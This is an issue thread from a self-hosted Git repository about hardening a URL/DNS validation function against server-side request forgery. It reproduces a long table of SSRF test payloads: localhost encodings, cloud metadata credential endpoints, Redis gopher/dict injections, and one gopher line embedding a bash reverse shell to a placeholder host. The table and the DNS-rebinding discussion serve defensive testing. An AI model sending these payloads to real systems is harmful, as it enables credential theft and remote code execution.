mike
/
fastapi
2
1
Fork 1
Code Issues 212 Pull Requests Packages Projects 1 Releases Wiki Activity

validDns function rewrite #1

New Issue
Open
opened 2023-03-10 21:30:14 +00:00 by mike · 7 comments
mike commented 2023-03-10 21:30:14 +00:00
Owner
Copy Link

As stated, validDns function needs rewrite

As stated, validDns function needs rewrite
9cfa was assigned by mike 2023-03-10 21:30:14 +00:00
mike added this to the Project Ideas project 2023-03-10 21:30:15 +00:00
9cfa commented 2023-03-11 05:06:56 +00:00
Collaborator
Copy Link
  • do not forget to use same values for allowed ports/schemes as production not to break something in future
- do not forget to use same values for allowed ports/schemes as production not to break something in future
mike commented 2023-03-11 09:29:20 +00:00
Author
Owner
Copy Link

In a fair world, the preprod would mimmic the prod env :D

In a fair world, the preprod would mimmic the prod env :D
9cfa commented 2023-03-13 21:20:16 +00:00
Collaborator
Copy Link

71143ee238

small test result

Request	Payload	Status
32	https://example.com/?q=http://evil.com/redirect.php.	200
0		200
1	https://127.0.0.1/	422
2	https://localhost/	422
3	http://[::]:80/	422
4	http://[::]:25/	422
6	http://[::]:3128/	422
5	http://[::]:22/	422
7	http://0000::1:80/	422
9	http://0000::1:22/	422
8	http://0000::1:25/	422
11	http://127.127.127.127	422
13	http://127.0.0.0	422
15	http://3232235521/	422
10	http://0000::1:3128/	422
12	http://127.0.1.3	422
14	http://2130706433/	422
17	http://2852039166/	422
16	http://3232235777/	422
18	http://0177.0.0.1/	422
23	http://0/	422
24	http://127.1	422
26	http://127.0.0.1/%61dmin	422
27	http://127.0.0.1/%2561dmin	422
25	http://127.0.1	422
22	http://[0:0:0:0:0:ffff:127.0.0.1]	422
35	http://instance-data	422
29	http://127.1.1.1:80\@@127.2.2.2:80/	422
28	http://127.1.1.1:80\@127.2.2.2:80/	422
37	http://169.254.169.254.nip.io/	422
30	http://127.1.1.1:80:\@@127.2.2.2:80/	422
31	http://127.1.1.1:80#\@127.2.2.2:80/	422
36	http://169.254.169.254	422
38	http://425.510.425.510/	422
39	http://7147006462/	422
42	http://0x41414141A9FEA9FE/	422
40	http://0xA9.0xFE.0xA9.0xFE/	422
41	http://0xA9FEA9FE/	422
21	http://q177.0.0.1/	422
20	http://0o177.0.0.1/	422
19	http://o177.0.0.1/	422
33	https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=	422
43	http://0251.0376.0251.0376/	422
44	http://0251.00376.000251.0000376/	422
45	http://0251.254.169.254	422
34	https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg	422
46	http://169.254.169.254/latest/user-data	422
47	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE	422
48	http://169.254.169.254/latest/meta-data/	422
49	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE	422
50	http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance	422
51	http://169.254.169.254/latest/meta-data/ami-id	422
52	http://169.254.169.254/latest/meta-data/reservation-id	422
53	http://169.254.169.254/latest/meta-data/hostname	422
54	http://169.254.169.254/latest/meta-data/public-keys/	422
55	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key	422
56	http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key	422
63	http://metadata.google.internal/computeMetadata/v1/	422
57	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy	422
64	http://metadata/computeMetadata/v1/	422
58	http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access	422
65	http://metadata.google.internal/computeMetadata/v1/instance/hostname	422
59	http://169.254.169.254/latest/dynamic/instance-identity/document	422
66	http://metadata.google.internal/computeMetadata/v1/instance/id	422
60	http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role	422
67	http://metadata.google.internal/computeMetadata/v1/project/project-id	422
62	http://169.254.169.254/computeMetadata/v1/	422
68	http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true	422
61	http://localhost:9001/2018-06-01/runtime/invocation/next	422
69	http://metadata.google.internal/computeMetadata/v1beta1/	422
75	http://169.254.169.254/metadata/v1/user-data	422
72	http://169.254.169.254/metadata/v1.json	422
74	http://169.254.169.254/metadata/v1/id	422
73	http://169.254.169.254/metadata/v1/	422
76	http://169.254.169.254/metadata/v1/hostname	422
79	http://169.254.169.254/metadata/v1/maintenance	422
81	http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text	422
80	http://169.254.169.254/metadata/instance?api-version=2017-04-02	422
77	http://169.254.169.254/metadata/v1/region	422
78	http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address	422
83	http://169.254.169.254/2009-04-04/meta-data/	422
85	http://192.0.0.192/latest/user-data/	422
82	http://169.254.169.254/openstack	422
86	http://192.0.0.192/latest/meta-data/	422
84	http://192.0.0.192/latest/	422
87	http://192.0.0.192/latest/attributes/	422
88	http://100.100.100.200/latest/meta-data/	422
90	http://100.100.100.200/latest/meta-data/image-id	422
89	http://100.100.100.200/latest/meta-data/instance-id	422
91	http://127.0.0.1:2375/v1.24/containers/json	422
94	url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp	422
93	url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php	422
95	url=dict://127.0.0.1:6379/SAVE	422
96	gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml	422
92	url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html	422
103	https://metadata.packet.net	422
97	gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php	422
104	https://metadata.google.internal	422
100	http://1.1.1.1 &@2.2.2.2# @3.3.3.3/	422
99	gopher://127.0.0.1:6379/_save	422
98	gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22	422
101	https://192.0.0.192	422
70	http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true	422
102	https://169.254.169.254	422
106	http://[0:0:0:0:0:ffff:169.254.169.254]	422
105	http://[::ffff:169.254.169.254]	422
71	http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json	422
107	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy	422
111	http://169.254.169.254/latest/meta-data/ami-id	422
109	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]	422
110	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]	422
108	http://169.254.169.254/latest/user-data	422
118	http://metadata.google.internal/computeMetadata/v1/	422
112	http://169.254.169.254/latest/meta-data/reservation-id	422
119	http://metadata/computeMetadata/v1/	422
116	http://169.254.170.2/v2/credentials/	422
115	http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key	422
120	http://metadata.google.internal/computeMetadata/v1/instance/hostname	422
113	http://169.254.169.254/latest/meta-data/hostname	422
121	http://metadata.google.internal/computeMetadata/v1/instance/id	422
122	http://metadata.google.internal/computeMetadata/v1/project/project-id	422
114	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key	422
123	http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env	422
117	http://169.254.169.254/computeMetadata/v1/	422
124	http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true	422
125	http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json	422
133	https://metadata.packet.net/userdata	422
128	http://169.254.169.254/metadata/v1/id	422
131	http://169.254.169.254/metadata/v1/region	422
130	http://169.254.169.254/metadata/v1/hostname	422
127	http://169.254.169.254/metadata/v1/ 	422
126	http://169.254.169.254/metadata/v1.json	422
132	http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address	422
129	http://169.254.169.254/metadata/v1/user-data	422
137	http://100.100.100.200/latest/meta-data/	422
136	http://169.254.169.254/opc/v1/instance/	422
138	http://100.100.100.200/latest/meta-data/instance-id	422
135	http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text	422
145	https://kubernetes.default.svc.cluster.local	422
134	http://169.254.169.254/metadata/instance?api-version=2017-04-02	422
146	https://kubernetes.default	422
139	http://100.100.100.200/latest/meta-data/image-id	422
147	https://kubernetes.default.svc/metrics	422
141	http://192.0.0.192/latest/	422
143	http://192.0.0.192/latest/meta-data/	422
142	http://192.0.0.192/latest/user-data/	422
144	http://192.0.0.192/latest/attributes/	422
140	http://169.254.169.254/openstack	 	400
http://172.16.100.2:3000/mike/fastapi/commit/71143ee2389036cd9365053e637e235ccdd9e9ae small test result ``` Request Payload Status 32 https://example.com/?q=http://evil.com/redirect.php. 200 0 200 1 https://127.0.0.1/ 422 2 https://localhost/ 422 3 http://[::]:80/ 422 4 http://[::]:25/ 422 6 http://[::]:3128/ 422 5 http://[::]:22/ 422 7 http://0000::1:80/ 422 9 http://0000::1:22/ 422 8 http://0000::1:25/ 422 11 http://127.127.127.127 422 13 http://127.0.0.0 422 15 http://3232235521/ 422 10 http://0000::1:3128/ 422 12 http://127.0.1.3 422 14 http://2130706433/ 422 17 http://2852039166/ 422 16 http://3232235777/ 422 18 http://0177.0.0.1/ 422 23 http://0/ 422 24 http://127.1 422 26 http://127.0.0.1/%61dmin 422 27 http://127.0.0.1/%2561dmin 422 25 http://127.0.1 422 22 http://[0:0:0:0:0:ffff:127.0.0.1] 422 35 http://instance-data 422 29 http://127.1.1.1:80\@@127.2.2.2:80/ 422 28 http://127.1.1.1:80\@127.2.2.2:80/ 422 37 http://169.254.169.254.nip.io/ 422 30 http://127.1.1.1:80:\@@127.2.2.2:80/ 422 31 http://127.1.1.1:80#\@127.2.2.2:80/ 422 36 http://169.254.169.254 422 38 http://425.510.425.510/ 422 39 http://7147006462/ 422 42 http://0x41414141A9FEA9FE/ 422 40 http://0xA9.0xFE.0xA9.0xFE/ 422 41 http://0xA9FEA9FE/ 422 21 http://q177.0.0.1/ 422 20 http://0o177.0.0.1/ 422 19 http://o177.0.0.1/ 422 33 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= 422 43 http://0251.0376.0251.0376/ 422 44 http://0251.00376.000251.0000376/ 422 45 http://0251.254.169.254 422 34 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg 422 46 http://169.254.169.254/latest/user-data 422 47 http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE 422 48 http://169.254.169.254/latest/meta-data/ 422 49 http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE 422 50 http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance 422 51 http://169.254.169.254/latest/meta-data/ami-id 422 52 http://169.254.169.254/latest/meta-data/reservation-id 422 53 http://169.254.169.254/latest/meta-data/hostname 422 54 http://169.254.169.254/latest/meta-data/public-keys/ 422 55 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key 422 56 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key 422 63 http://metadata.google.internal/computeMetadata/v1/ 422 57 http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy 422 64 http://metadata/computeMetadata/v1/ 422 58 http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access 422 65 http://metadata.google.internal/computeMetadata/v1/instance/hostname 422 59 http://169.254.169.254/latest/dynamic/instance-identity/document 422 66 http://metadata.google.internal/computeMetadata/v1/instance/id 422 60 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role 422 67 http://metadata.google.internal/computeMetadata/v1/project/project-id 422 62 http://169.254.169.254/computeMetadata/v1/ 422 68 http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true 422 61 http://localhost:9001/2018-06-01/runtime/invocation/next 422 69 http://metadata.google.internal/computeMetadata/v1beta1/ 422 75 http://169.254.169.254/metadata/v1/user-data 422 72 http://169.254.169.254/metadata/v1.json 422 74 http://169.254.169.254/metadata/v1/id 422 73 http://169.254.169.254/metadata/v1/ 422 76 http://169.254.169.254/metadata/v1/hostname 422 79 http://169.254.169.254/metadata/v1/maintenance 422 81 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text 422 80 http://169.254.169.254/metadata/instance?api-version=2017-04-02 422 77 http://169.254.169.254/metadata/v1/region 422 78 http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address 422 83 http://169.254.169.254/2009-04-04/meta-data/ 422 85 http://192.0.0.192/latest/user-data/ 422 82 http://169.254.169.254/openstack 422 86 http://192.0.0.192/latest/meta-data/ 422 84 http://192.0.0.192/latest/ 422 87 http://192.0.0.192/latest/attributes/ 422 88 http://100.100.100.200/latest/meta-data/ 422 90 http://100.100.100.200/latest/meta-data/image-id 422 89 http://100.100.100.200/latest/meta-data/instance-id 422 91 http://127.0.0.1:2375/v1.24/containers/json 422 94 url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp 422 93 url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php 422 95 url=dict://127.0.0.1:6379/SAVE 422 96 gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml 422 92 url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html 422 103 https://metadata.packet.net 422 97 gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php 422 104 https://metadata.google.internal 422 100 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ 422 99 gopher://127.0.0.1:6379/_save 422 98 gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 422 101 https://192.0.0.192 422 70 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true 422 102 https://169.254.169.254 422 106 http://[0:0:0:0:0:ffff:169.254.169.254] 422 105 http://[::ffff:169.254.169.254] 422 71 http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json 422 107 http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy 422 111 http://169.254.169.254/latest/meta-data/ami-id 422 109 http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] 422 110 http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] 422 108 http://169.254.169.254/latest/user-data 422 118 http://metadata.google.internal/computeMetadata/v1/ 422 112 http://169.254.169.254/latest/meta-data/reservation-id 422 119 http://metadata/computeMetadata/v1/ 422 116 http://169.254.170.2/v2/credentials/ 422 115 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key 422 120 http://metadata.google.internal/computeMetadata/v1/instance/hostname 422 113 http://169.254.169.254/latest/meta-data/hostname 422 121 http://metadata.google.internal/computeMetadata/v1/instance/id 422 122 http://metadata.google.internal/computeMetadata/v1/project/project-id 422 114 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key 422 123 http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env 422 117 http://169.254.169.254/computeMetadata/v1/ 422 124 http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true 422 125 http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json 422 133 https://metadata.packet.net/userdata 422 128 http://169.254.169.254/metadata/v1/id 422 131 http://169.254.169.254/metadata/v1/region 422 130 http://169.254.169.254/metadata/v1/hostname 422 127 http://169.254.169.254/metadata/v1/ 422 126 http://169.254.169.254/metadata/v1.json 422 132 http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address 422 129 http://169.254.169.254/metadata/v1/user-data 422 137 http://100.100.100.200/latest/meta-data/ 422 136 http://169.254.169.254/opc/v1/instance/ 422 138 http://100.100.100.200/latest/meta-data/instance-id 422 135 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text 422 145 https://kubernetes.default.svc.cluster.local 422 134 http://169.254.169.254/metadata/instance?api-version=2017-04-02 422 146 https://kubernetes.default 422 139 http://100.100.100.200/latest/meta-data/image-id 422 147 https://kubernetes.default.svc/metrics 422 141 http://192.0.0.192/latest/ 422 143 http://192.0.0.192/latest/meta-data/ 422 142 http://192.0.0.192/latest/user-data/ 422 144 http://192.0.0.192/latest/attributes/ 422 140 http://169.254.169.254/openstack 400 ```
9cfa commented 2023-03-14 04:18:49 +00:00
Collaborator
Copy Link

the moment when this is going to be rolled out into production, check all callback formats if they pass the new checks - whitelisting character and ports.

the moment when this is going to be rolled out into production, check all callback formats if they pass the new checks - whitelisting character and ports.
9cfa commented 2023-03-14 06:08:53 +00:00
Collaborator
Copy Link

when deploying py requests in call script, it should validate the domain again before calling to protect from dns rebinding. also requests needs to have following redirections disabled.

when deploying py requests in call script, it should validate the domain again before calling to protect from dns rebinding. also requests needs to have following redirections disabled.
mike closed this issue 2023-03-14 18:00:58 +00:00
9cfa commented 2023-04-04 18:50:24 +00:00
Collaborator
Copy Link

dns rebinding protection needs to be implemented.

dns rebinding protection needs to be implemented.
9cfa reopened this issue 2023-04-04 18:50:26 +00:00
9cfa commented 2023-04-04 18:52:05 +00:00
Collaborator
Copy Link

Two consecutive calls to socket.getaddrinfo aren't guaranteed to return the same info, depending on the system configuration. If the "safe" looking record TTLs between the verification lookup and the lookup for actually opening the socket, we may end up connecting to a very different server than the one we OK'd!

Advocate gets around this by only using one getaddrinfo call for both verification and connecting the socket. In pseudocode:

def connect_socket(host, port):
for res in socket.getaddrinfo(host, port):
# where res will be a tuple containing the IP for the host
if not is_blacklisted(res):
# ... connect the socket using res

Two consecutive calls to socket.getaddrinfo aren't guaranteed to return the same info, depending on the system configuration. If the "safe" looking record TTLs between the verification lookup and the lookup for actually opening the socket, we may end up connecting to a very different server than the one we OK'd! Advocate gets around this by only using one getaddrinfo call for both verification and connecting the socket. In pseudocode: def connect_socket(host, port): for res in socket.getaddrinfo(host, port): # where `res` will be a tuple containing the IP for the host if not is_blacklisted(res): # ... connect the socket using `res`
Sign in to join this conversation.
main
Branches Tags
Clear current reference
main
Clear current reference
Labels
Clear labels   
bug

Something is not working

  
duplicate

This issue or pull request already exists

  
enhancement

New feature

  
help wanted

Need some help

  
invalid

Something is wrong

  
question

More information is needed

  
wontfix

This won't be fixed

No Label
bug
duplicate
enhancement
help wanted
invalid
question
wontfix
Milestone
Clear milestone
No items
No Milestone
Projects
Clear projects
No project
Project Ideas
Assignees
Clear assignees
No Assignees
9cfa
2 Participants
Notifications
Due Date
The due date is invalid or out of range. Please use the format 'yyyy-mm-dd'.

No due date set.

Dependencies

No dependencies set.

Reference: mike/fastapi#1
No description provided.
Delete Branch "%!s(<nil>)"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?